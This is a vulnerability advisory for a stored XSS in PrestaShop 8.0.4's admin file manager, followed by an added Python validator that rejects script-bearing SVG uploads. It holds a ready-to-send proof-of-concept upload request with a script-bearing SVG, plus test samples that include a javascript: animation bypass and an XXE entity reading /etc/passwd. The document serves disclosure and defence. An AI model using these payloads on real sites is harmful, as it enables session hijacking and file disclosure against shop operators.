Exploit Title: PrestaShop 8.0.4 - Cross-Site Scripting (XSS)
Application: PrestaShop
Version: 8.0.4
Bugs: Stored XSS
Technology: php
Vendor URL: https://prestashop.com/
Software Link: https://prestashop.com/prestashop-edition-basic/
Date Found: 30.06.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
====================================================
Steps:
1. Go to Catalog => Products
2. Select an arbitrary product
3. Upload the malicious SVG file through the product's file manager (the filemanager/upload.php endpoint shown in the request below). The file is accepted as image/svg+xml and stored on the server, so whoever later opens it in a browser runs the embedded script (stored XSS).
SVG file content ===
<?xml version='1.0' standalone='no'?>
!
<svg version='1.1' baseProfile='full' xmlns='http://www.w3.org/2000/svg'>
<polygon id='triangle' points='0,0 0,50 50,0' fill='#009900' stroke='#004400'/>
<script type='text/javascript'>
alert(document.location);
</script>
</svg>
POC Request:
POST /admin253irhit4jjbd9gurze/filemanager/upload.php HTTP/1.1
Host: localhost
Content-Length: 756
sec-ch-ua:
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzp0ewySQ0YSV2SCZ
Accept: application/json
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
sec-ch-ua-platform: ""
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/admin253irhit4jjbd...cending=1descending=falsesort_by=lang=lang=en
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=JCSQ33E9KK7SK7SK5M3BSSJVHHGGT; PrestaShop-C1C78947C88162EB206771DF4A41C662=DEF502004DD8C2A13335B9BE53C804392B0A2C75C75CFFFF9BDB5C1 9CD61A5607C418B0F035C998ECF5B54C45E92F99C4E4E01CFAB3D0AF19E89F664379D034EEEF94EEEF9F9FB2B26CDA14713D019A4 C3BE8322C0F43BE6EEE245F9AB58A590058989B65701B1894D2A6857C3A6F542B71501EA0D8695E3695E3642EC9A317C99 BE7A752CBF54A31AF3EB042F935DBFB7586D53E0C1CC72D965C806E66B150A3F5CA5CA5CA5CA5CA5CA5CA5CA5CA512A5577777AB2D4038A0FC52 1F9C4092B5F7BCD031FB09250D825BFA0D3B68E8F0329BF725BCD2565AA0997C4F352D0F156CD0F156CD3B53B5FA922DE6A777F4 6EB1DAE7DBAC79B172597D56D3F842B91D25354E597C14C618FFB5FB5EFA795611FFB3E04CEDBEBBB33333D6D6D8CC0DA28AC1A4 32A8A310C18A1A449568A7A66C7444379E23BE16563E8FF26B5CD8694C1E7FE43344710A555555567777527C7527C7C7590348E6DAF7 D438827B3AD748E99AFE6842A508B14DC754FECFC5D0706869B34A9DD7630B12694C5ED865CCACACACB9B9B9B9B9B9B9B05D58D6D92; PrestaShop-8edfcba6bf6b77ff3bb3d94e0228b048=def50200a47caf7b8d80335ae708e2f3182075135ab6b23986be859d96bde645e28f7b847b9dd1947867a 8D1A976E10BB88D799F690ED85266F0515212C75D60115E5998F3BD6D6D69DF403 8125DBE6A3DF081EA53A363959D276AAA046F958AD7F100B252E6305AB0A36808E F58868AB8BF11E941729ECA845709D4578DEAC87D18771AEB7B7B7B7B7B93DC1652344A 89b5222394C68DC5F72F137D41708ADE1916630E768B005EA48BB063DB2DE8A 4E93BB8142C5206C73A72C33BCACE8BCC7A0F9BA713590261F8DDEE4692955 709B631566C1097ACF676A1DAA41E44B497834DA8685E2156B0FE90FE90ABD0C0B47 D24DB358A7440C1469394AC302C800A0136B463ABA2957206F8B09A43D9D1FC 5F524A4E7D7A6CA7D09D60C9A1EE155262E02267267260ABEC3CA148D5A20D1D4A 3a50c8d4abcaefe11d4503f7e5e72ee766b53507603e7a7573cabd45f7a56208658e00d5230f2e4b4bf1c8a45afa0de3a96883723fedf705ff1a96bbf6ac80fd CDE5A9631148B7B9356BC490477774D705E0986081C7609C64F0F11C0F11C0F5F5F2B8D10 A578DB400373C02E333252EC319D517B92F01479A39B2BDE7826B488E1BA64613 c485146fc3d130e0da627672409b11210976cb8bbe70312cbc94a9bddceec917ee633efdd241fcfc2106a0a49cc7bdeb13928786bad26a00b9cc78c08e5e6ff55
Connection: close

------WebKitFormBoundaryzp0ewySQ0YSV2SCZ
Content-Disposition: form-data; name="path"

------WebKitFormBoundaryzp0ewySQ0YSV2SCZ
Content-Disposition: form-data; name="path_thumb"

------WebKitFormBoundaryzp0ewySQ0YSV2SCZ
Content-Disposition: form-data; name="file"; filename="malas.svg"
Content-Type: image/svg+xml

<?xml version='1.0' standalone='no'?>
!
<svg version='1.1' baseProfile='full' xmlns='http://www.w3.org/2000/svg'>
<polygon id='triangle' points='0,0 0,50 50,0' fill='#009900' stroke='#004400'/>
<script type='text/javascript'>
alert(document.location);
</script>
</svg>
------WebKitFormBoundaryzp0ewySQ0YSV2SCZ--
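The upload handler in the request above accepts the SVG on the strength of the client-supplied filename and Content-Type. The check below is an added example of the server-side gate such a handler needs; it is not PrestaShop code and does not use any PrestaShop API. It treats the upload as untrusted XML and refuses it if it carries a DTD, a <script> or <foreignObject> element, an on* event-handler attribute, or a javascript:/vbscript: URL in any attribute value (which also covers SMIL animations that rewrite an href at runtime, a case beyond the advisory's plain <script> payload). The sample documents are constructed for the example; PAYLOAD mirrors the advisory's SVG.

```python
"""Gate for SVG uploads: reject anything that can run script in the viewer.

Added example, not PrestaShop's code. Decides on the file bytes, never on the
client's declared Content-Type or filename extension, both attacker-chosen.
"""
import re
import xml.etree.ElementTree as ET

# Elements that execute or embed active content; refused outright.
FORBIDDEN_TAGS = {"script", "foreignobject", "handler", "iframe", "embed", "object"}
# data: URLs are only tolerated when they carry a raster image.
SAFE_DATA_URL = re.compile(r"^data:image/(png|jpe?g|gif|webp)[;,]")


def _local(qname: str) -> str:
    """'{http://www.w3.org/2000/svg}script' -> 'script' (ElementTree qualified names)."""
    return qname.rsplit("}", 1)[-1]


def _norm(value: str) -> str:
    """Browsers ignore whitespace/control chars inside a scheme ('java\\tscript:')."""
    return re.sub(r"[\s\x00-\x1f]+", "", value).lower()


def check_svg(data: bytes) -> tuple[bool, str]:
    """Return (accepted, reason) for an uploaded SVG body."""
    # Refuse DTDs before parsing: stdlib expat expands internal entities.
    if b"<!doctype" in data.lower() or b"<!entity" in data.lower():
        return False, "DTD or entity declaration present"
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return False, f"not well-formed XML: {exc}"
    if _local(root.tag).lower() != "svg":
        return False, f"root element is <{_local(root.tag)}>, not <svg>"
    for el in root.iter():  # includes the root, so onload= on <svg> is caught
        tag = _local(el.tag)
        if tag.lower() in FORBIDDEN_TAGS:
            return False, f"forbidden element <{tag}>"
        for name, value in el.attrib.items():
            lname = _local(name).lower()
            if lname.startswith("on"):
                return False, f"event handler {lname}= on <{tag}>"
            v = _norm(value)  # char refs such as &#x09; are already decoded by the parser
            if "javascript:" in v or "vbscript:" in v:
                return False, f"script URL in {lname}= on <{tag}>"
            if lname in ("href", "src") and v.startswith("data:") and not SAFE_DATA_URL.match(v):
                return False, f"non-image data: URL in {lname}= on <{tag}>"
    return True, "ok"


# Constructed samples (not captured from a real system).
PAYLOAD = b"""<?xml version='1.0' standalone='no'?>
<svg version='1.1' baseProfile='full' xmlns='http://www.w3.org/2000/svg'>
  <polygon id='triangle' points='0,0 0,50 50,0' fill='#009900' stroke='#004400'/>
  <script type='text/javascript'>alert(document.location);</script>
</svg>"""
BENIGN = b"""<svg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 50 50'>
  <polygon points='0,0 0,50 50,0' fill='#009900'/>
</svg>"""
ONLOAD = b"<svg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'/>"
# SMIL animation rewriting href at runtime, tab inside the scheme, entity-encoded.
BYPASS = b"""<svg xmlns='http://www.w3.org/2000/svg'>
  <a href='#'><animate attributeName='href' values='#;java&#x09;script:alert(1)'/>
  <text y='20'>click me</text></a>
</svg>"""
XXE = b"""<!DOCTYPE svg [<!ENTITY e SYSTEM 'file:///etc/passwd'>]>
<svg xmlns='http://www.w3.org/2000/svg'><text>&e;</text></svg>"""

if __name__ == "__main__":
    for label, sample in [("payload", PAYLOAD), ("benign", BENIGN), ("onload", ONLOAD),
                          ("animate bypass", BYPASS), ("xxe", XXE)]:
        print(f"{label:15} -> {check_svg(sample)}")
```

A deny-list like this is one layer only. The other is how the stored file is served: user uploads should come back with `X-Content-Type-Options: nosniff` and either `Content-Disposition: attachment` or a `Content-Security-Policy: sandbox` (or `default-src 'none'`) header, or be rasterised on upload, so that an SVG that slips through still cannot run script in the shop's origin.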